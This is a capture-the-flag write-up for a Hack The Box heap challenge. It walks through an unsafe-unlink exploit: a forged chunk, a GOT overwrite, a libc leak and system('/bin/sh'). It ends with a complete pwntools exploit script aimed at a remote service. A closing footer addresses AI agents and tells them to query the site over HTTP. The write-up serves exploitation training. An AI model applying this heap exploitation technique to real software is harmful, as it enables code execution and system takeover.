# Unlink Exploit ## Summary In this approach, we overwrite `PREV_SIZE` to shrink the size of the previous chunk. This tricks the heap into thinking that the previous chunk's metadata starts *where our data does*, enabling us to control chunk metadata. As we can control the `fd` and `bk` pointers, we can execute an [**unlink exploit**](https://ir0nstone.gitbook.io/notes/types/heap/unlink-exploit). We can bypass the [unlink security checks ](https://ir0nstone.gitbook.io/notes/types/heap/unlink-exploit#protections)by pointing `fd` and `bk` to the chunklist, which contains a pointer to the chunk. This enables us to overwrite a chunklist entry with the address of the chunklist itself, meaning we can now edit the chunklist. This gives us the ability to write to wherever we want, and we choose to target the GOT. We can overwrite `strlen@got` with `puts@plt` as that makes it functionally equivalent and then read a libc address. From here we overwrite `free@got` with the address of system and `free()` a chunk containing `/bin/sh`. ## Exploitation ### The Unlink To bypass the unlink check, we need `P->fd->bk` to point to the address of `P`, meaning `P->fd` has to point `0x18` bytes behind it. Because we want `P->fd` to be within the chunklist (most simply at the beginning), we will allocate 3 chunks before the chunk we use for the `unlink()` exploit. Each chunk we allocate takes up `0x8` bytes of space on the chunklist (this will make more sense later, I promise). We'll choose a size of `0x98` for the chunks. Firstly, this means the chunk does not fall in **fastbin range**. Secondly, the additional `0x8` bytes means we do in fact overwrite `prev_size`. Other sizes such as `0x108` would also work, but make sure Chunk 4 overwrites Chunk 5's `prev_size` field. ```python alloc() alloc() alloc() alloc(data='A' * 0x98) alloc() ``` ![PREV\_SIZE is overwritten](/files/-MPAiLTpvydRm8btYC46) Now we will create a *fake chunk*. The fake size we give it will be the difference between the start of our fake data and the next consecutive chunk. In this case, that is `0x90` - as you see from the image, the difference between chunks *4* and *5* is `0xa0`, so if we remove the metadata the fake chunk is `0x90`. We'll also overwrite `PREV_IN_USE` to trick it into thinking it's free. ```python fake_chunk = flat( 0x0, # fake prev_size (of fake chunk) 0x91, # fake size CHUNKLIST, # fd (controlled) CHUNKLIST + 8, # bk (controlled) b'A' * 0x70, # pad to -8 off max size so we can fake prev_size 0x90 # fake prev_size ) fake_chunk += p16(0xa0) # overwrite PREV_IN_USE edit(3, fake_chunk) ``` And if we send this all off, we can see it worked perfectly: ![](/files/-MM6siGn5gKQpFIburDO) radare2 tells us chunk 4 is free. Chunk 5 has a new `prev_size` and `P` is no longer set. If we run `dmhc` again to view the chunk at *`location of chunk 5 - 0x90`*, our fake chunk is set up exactly as planned. Now we *free* chunk 5, making Chunks 4 and 5 consolidate. This triggers a call to the `unlink()` macro on Chunk 4. Let's look at how we expect the unlink to go. ```c FD = P->fd (= CHUNKLIST) BK = P->bk (= CHUNKLIST + 8) FD->bk = BK (CHUNKLIST + 0x18 = CHUNKLIST) BK->fd = FD (CHUNKLIST + 8 + 0x10 = CHUNKLIST) ``` Both writes write to `CHUNKLIST + 0x18`, and the value written is the **address of the chunklist**. Now, if we edit Chunk 3, we're actually editing the *chunklist itself* as that's where the pointer points to. We also manage to bypass the [unlink check](https://ir0nstone.gitbook.io/notes/types/heap/unlink-exploit#protections) by getting `FD->bk` and `BK->fd` to point at the chunk's entry in the list. Note that the value written was the location of `fd`, so if the chunk we overflowed with was Chunk 0 we would have had to write to a location ahead of the chunklist in memory in order to bypass the check, and pad all the way to the start before we could edit chunklist entries. By allocating 3 chunks before the overflow chunk we were able to write the chunklist address to entry 4 directly **and** bypass the check, meaning we had to mess around with padding less. And it definitely worked: ![The 4th Pointer is overwritten with the chunklist address](/files/-MPAkHjx_Bv-85_Ou4vz) ### LIBC Leak Editing Chunk 3 now edits the chunklist itself, meaning we can overwrite pointers and gain arbitrary writes. If we go back to the disassembly of `edit()`, we notice `strlen()` is called on the chunk data. We can overwrite `strlen@got` with `puts@plt` to print out this data instead - and using `puts` has an additional benefit: puts **also** returns the length of the string it reads. This means the program will not break, but we'll still gain the additional functionality. Once we overwrite `strlen@got`, we'll call `edit()` on another GOT entry (`free`) to leak libc. ```python # now we write strlen@GOT to the chunklist edit(3, p64(elf.got['strlen'])) edit(0, p64(elf.plt['puts'])) # now when we edit() we read chunk contents # but strlen@got holds a PLT address, so let's change the GOT entry for the leak edit(3, p64(elf.got['free'])) ``` Now we just attempt to edit Chunk 0. Because it would print the libc address as soon as we enter the index, we'll have to do this part manually or the `p.sendlineafter()` lines would skip over the leak. ```python p.sendline('2') p.sendlineafter('Index: ', '0') print(p.clean()) ``` The response we get is ``` b'@u\xdb%\xc0\x7f\nData: ' ``` So it worked! Let's just parse the response and print out the leak. ```python free_leak = u64(p.recv(6) + b'\x00\x00') log.success('Free Leak: ' + hex(free_leak)) libc.address = free_leak - libc.symbols['free'] log.success('Libc base: ' + hex(libc.address)) p.recvuntil('Data: ') # just receive the rest ``` ``` [+] Free Leak: 0x7f2211927540 [+] Libc base: 0x7f22118a3000 ``` Perfect. ### Getting a Shell This is quite simple - change a GOT entry such as `free` and replace it with `system`. Then, if the chunk contains `/bin/sh`, it'll get passed to the function as a parameter. You may notice the 2nd and 3rd chunks have been untouched so far, so we could easily place the `/bin/sh` in one of those right at the beginning for use now. ```python # right at the beginning alloc() alloc(data='/bin/sh\x00') alloc() alloc(data='A' * 0x98) alloc() ``` We're currently halfway through using `edit()` on `free@got`, so we can just continue inputting `system@libc` as the data, then free Chunk 1. ```python p.sendline(p64(libc.symbols['system'])) # pass in system@libc as the data free(1) # trigger system@libc with the parameter /bin/sh p.interactive() ``` And boom - success! ``` [+] Free Leak: 0x7f04d4413540 [+] Libc base: 0x7f04d438f000 [*] Switching to interactive mode $ ls chapter1 exploit.py ``` ### Moving to Remote There are a few changes we need to make remotely. Firstly, the libc *may* be different (it was for me). Simply leak a couple more libc addresses and use somewhere like [here](https://libc.blukat.me/) to identify the libc version. We can also change the beginning of our script. ```python if args.REMOTE: p = remote('167.71.140.171', 31713) libc = ELF('./libc-remote.so') else: p = process() libc = elf.libc ``` Secondly, the way the service uses `socat` means it echoes our input back to us. Because of the way we use `p.sendlineafter()`, this doesn't affect us until we parse the libc leak. We can just listen to the extra data if it's on `REMOTE` mode. ```python if args.REMOTE: p.recvuntil('0\r\n') # echoed back free_leak = u64(p.recv(6) + b'\x00\x00') # now leak as usual # [...] ``` Thirdly, the `socat` used has `pty` enabled. This means it interprets the `\x7f` we send as the ascii representation of **backspace**, which would delete anything we sent. To mitigate this (it's only relevant when sending `system`) we just check if we're on `REMOTE` mode and if we are we can escape the `\x7f` with `\x16`, the `socat` escape character. ```python system = p64(libc.symbols['system']) if args.REMOTE: system = system.replace(b'\x7f', b'\x16\x7f') # escape backspace p.sendline(system) ``` And it works perfectly! ``` [+] Free Leak: 0x7fe8285324f0 [+] Libc base: 0x7fe8284ae000 [*] Switching to interactive mode $ cat flag HTB{Singl3?_NO!_D0ubl3?_NO!_Tr1pl3_Unsaf3_Unlink} ``` ## Final Exploit ```python from pwn import * elf = context.binary = ELF('./chapter1', checksec=False) if args.REMOTE: p = remote('178.62.90.208', 30352) libc = ELF('./libc-remote.so') else: p = process() libc = elf.libc CHUNKLIST = 0x6020c0 def alloc(size=0x98, data='a'): p.sendlineafter('>> ', '1') p.sendlineafter('Size: ', str(size)) p.sendlineafter('Data: ', data) def free(idx): p.sendlineafter('>> ', '3') p.sendlineafter('Index: ', str(idx)) def edit(idx, data='a'): p.sendlineafter('>> ', '2') p.sendlineafter('Index: ', str(idx)) p.sendlineafter('Data: ', data) alloc() alloc(data='/bin/sh\x00') alloc() alloc(data='A' * 0x98) alloc() fake_chunk = flat( 0x0, # fake prev_size (of fake chunk) 0x91, # fake size CHUNKLIST, # fd (controlled) CHUNKLIST + 8, # bk (controlled) b'A' * (0x70), # pad to -8 off max size so we can fake prev_size 0x90 # fake prev_size ) fake_chunk += p16(0xa0) # overwrite PREV_IN_USE edit(3, fake_chunk) free(4) # now we write strlen@GOT to the chunklist edit(3, p64(elf.got['strlen'])) edit(0, p64(elf.plt['puts'])) # now when we edit() we read chunk contentx # but strlen@got holds a PLT address, so let's change the GOT entry for the leak edit(3, p64(elf.got['free'])) # have to do this one part at a time to grab the address p.sendline('2') p.sendlineafter('Index: ', '0') if args.REMOTE: p.recvuntil('0\r\n') free_leak = u64(p.recv(6) + b'\x00\x00') log.success('Free Leak: ' + hex(free_leak)) libc.address = free_leak - libc.symbols['free'] log.success('Libc base: ' + hex(libc.address)) p.recvuntil('Data: ') # just receive the rest # send system system = p64(libc.symbols['system']) if args.REMOTE: system = system.replace(b'\x7f', b'\x16\x7f') # socat badchars - \x7f interpreted as backspace, escape with \x16 p.sendline(system) free(1) p.interactive() ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ir0nstone.gitbook.io/notes/writeups/hack-the-box/challenges/pwn/dream-diary-chapter-1/unlink-exploit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.